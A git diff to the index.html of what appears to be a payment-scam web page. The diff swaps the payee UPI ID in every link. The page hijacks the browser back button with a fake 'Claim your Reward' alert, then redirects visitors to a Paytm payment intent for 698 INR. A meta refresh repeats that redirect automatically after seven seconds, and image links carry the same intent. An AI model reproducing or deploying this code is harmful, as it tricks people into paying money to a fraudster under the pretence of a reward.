--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
         onpopstate = function (t) {
           t.state && alert(' Claim your Reward by Clicking on \n "SEND IN BANK ACCOUNT"  ')
           location.href =
-            'paytmmp://pay?pa=vroomm888@barodampay&pn=null&mc=&tn=&am=698&cu=INR&url=&mode=02&purpose=00&orgid=159024&sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex';
+            'paytmmp://pay?pa=shugeez@sbi&pn=null&mc=&tn=&am=698&cu=INR&url=&mode=02&purpose=00&orgid=159024&sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex';
         }
       } catch (o) {}
     }();
@@ -40,7 +40,7 @@
 
 <body>
 
-  <a id="anc" href="paytmmp://pay?pa=vroomm888@barodampay&amp;pn=null&amp;mc=&amp;tn=&amp;am=698&amp;cu=INR&amp;url=&amp;mode=02&amp;purpose=00&amp;orgid=159024&amp;sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex">
+  <a id="anc" href="paytmmp://pay?pa=shugeez@sbi&amp;pn=null&amp;mc=&amp;tn=&amp;am=698&amp;cu=INR&amp;url=&amp;mode=02&amp;purpose=00&amp;orgid=159024&amp;sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex">
     <div>
       <img src="OP.jpg" width="100%" height="auto">
     </div>
@@ -86,14 +86,14 @@
   <font color="green">
 
     <br>
-    <a href="paytmmp://pay?pa=vroomm888@barodampay&amp;pn=null&amp;mc=&amp;tn=&amp;am=698&amp;cu=INR&amp;url=&amp;mode=02&amp;purpose=00&amp;orgid=159024&amp;sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex">
+    <a href="paytmmp://pay?pa=shugeez@sbi&amp;pn=null&amp;mc=&amp;tn=&amp;am=698&amp;cu=INR&amp;url=&amp;mode=02&amp;purpose=00&amp;orgid=159024&amp;sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex">
 
 
       <img src="YP.jpg" width="100%" height="auto">
     </a>
 
 
-    <meta http-equiv="refresh" content="7;url=paytmmp://pay?pa=vroomm888@barodampay&amp;pn=null&amp;mc=&amp;tn=&amp;am=698&amp;cu=INR&amp;url=&amp;mode=02&amp;purpose=00&amp;orgid=159024&amp;sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex">
+    <meta http-equiv="refresh" content="7;url=paytmmp://pay?pa=shugeez@sbi&amp;pn=null&amp;mc=&amp;tn=&amp;am=698&amp;cu=INR&amp;url=&amp;mode=02&amp;purpose=00&amp;orgid=159024&amp;sign=MEYCIQCgpTe2xeoNfYGFQ8SsqsibjjRtneNFQFlmLfZYC/vC5wIhANeXald38G4FMySMNEoGC0/zfwLlPGfpNRrDrwF7d3Ex">
 
     <script>
       (function () {
